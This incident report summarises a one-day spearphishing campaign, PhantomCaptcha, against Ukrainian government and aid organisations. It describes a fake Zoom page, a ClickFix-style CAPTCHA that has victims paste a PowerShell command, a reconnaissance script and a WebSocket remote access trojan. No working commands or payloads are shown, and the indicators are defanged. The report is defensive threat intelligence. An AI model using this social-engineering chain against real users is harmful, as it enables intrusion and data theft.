Full Report
A spearphishing attack that lasted a single day targeted members of the Ukrainian regional government administration and organizations critical for the war relief effort in Ukraine, including the International Committee of the Red Cross, UNICEF, and various NGOs. [...]
Analysis Summary
# Incident Report: PhantomCaptcha ClickFix Attack Targeting Ukraine Relief Efforts
## Executive Summary
A one-day spearphishing campaign, dubbed PhantomCaptcha, targeted Ukrainian regional government administration and aid organizations (including ICRC and UNICEF) on October 8, 2025. Attackers used fake Cloudflare CAPTCHA prompts disguised as Zoom verification to deploy a WebSocket Remote Access Trojan (RAT) via a malicious PowerShell execution triggered by a browser instruction. The primary impact was system reconnaissance and preparation for remote access/data exfiltration, with the C2 infrastructure noted to be hosted on Russian infrastructure.
## Incident Details
- Discovery Date: Prior to or during the operation launch, analyzed by SentinelLabs.
- Incident Date: October 8, 2025 (Single day campaign).
- Affected Organization: Ukrainian regional government administration and war relief organizations (ICRC, UNICEF, NGOs).
- Sector: Government Administration, Non-Profit/Aid Organization.
- Geography: Ukraine.
## Timeline of Events
### Initial Access
- Date/Time: October 8, 2025 (Specific time unknown, campaign duration was one day).
- Vector: Spear-phishing email disguised as communications from the Ukrainian President’s Office.
- Details: Emails contained malicious PDF attachments linking to a domain impersonating Zoom (`zoomconference[.]app`).
### Lateral Movement
- Details: The initial infection path led to the download and execution of a reconnaissance utility (_cptch_) which collected system data (OS, domain, user, processes, UUID) before deploying the final WebSocket RAT. The final RAT's capability suggests potential for post-compromise lateral movement via remote command execution.
### Data Exfiltration/Impact
- Details: The first stage payload collected system configuration data. The final WebSocket RAT was capable of remote command execution and data exfiltration via base64-encoded JSON commands. A subsequent, potentially related operation involved Android spyware targeting Lviv users.
### Detection & Response
- Detection: Identified and analyzed by SentinelLABS threat researchers.
- Response Actions: Not explicitly detailed in the provided text, but analysis of the threat infrastructure was performed.
## Attack Methodology
- Initial Access: Spear-phishing via email with malicious documents linking to a fake Zoom landing page.
- Persistence: Unknown for the initial stage, but the final payload was a WebSocket RAT, implying long-term command-and-control capability.
- Privilege Escalation: Not explicitly detailed, but required user interaction (copy/paste into CMD) to execute PowerShell.
- Defense Evasion: Utilized a multi-stage process masquerading as legitimate web services (Zoom/Cloudflare CAPTCHA) to trick the user into executing system commands.
- Credential Access: Not explicitly detailed, but obtainable via RAT capabilities.
- Discovery: System profiling utility (_cptch_) collected environment details (computer name, domain info, username, PIDs, UUID).
- Lateral Movement: Enabled via the WebSocket RAT's remote command execution capability.
- Collection: System data gathered by the reconnaissance utility; data exfiltration capability built into the final RAT.
- Exfiltration: Data exfiltration supported via base64-encoded JSON commands over the WebSocket protocol.
- Impact: System compromise, deployment of a RAT, and reconnaissance of victim environments.
## Impact Assessment
- Financial: Not disclosed.
- Data Breach: System configuration data collected; potential for further data theft via RAT.
- Operational: Disruption caused by social engineering attempts and initial execution, though the campaign was short-lived.
- Reputational: Potential damage to the reputations of targeted relief organizations.
## Indicators of Compromise
- Network Indicators: WebSocket C2 connection utilized; C2 infrastructure hosted on **Russian infrastructure** (Specific IPs/Domains defanged).
- File Indicators: Malicious script named **`cptch`** used for second-stage payload delivery.
- Behavioral Indicators: User prompted to copy a token and paste it into Windows Command Prompt to execute a PowerShell command; generation of a client identifier passed over a WebSocket connection for potential social engineering engagement.
## Response Actions
- Containment: (Not explicitly detailed, typically involves isolating affected systems and blocking C2 communication).
- Eradication: (Not explicitly detailed, typically involves removing the RAT and associated persistence mechanisms).
- Recovery Actions: (Not explicitly detailed, focusing on reverting system changes and validating security posture).
## Lessons Learned
- Sophisticated social engineering remains effective, leveraging established infrastructure like Zoom and CAPTCHA prompts to lower user suspicion.
- Attackers are willing to invest significant time in infrastructure setup (domains registered months prior) for short, high-impact campaigns.
- The use of native Windows functions (PowerShell execution via Copy/Paste) remains a highly effective, low-signature infection vector.
## Recommendations
- Implement stricter controls on file execution initiated via user interaction, especially commands copied from web pages.
- Enhance network monitoring for unexpected WebSocket traffic patterns, particularly those associated with C2 communication.
- Conduct targeted phishing simulation training focused on sophisticated brand impersonation (government offices, common communication platforms like Zoom, and security checks like CAPTCHAs).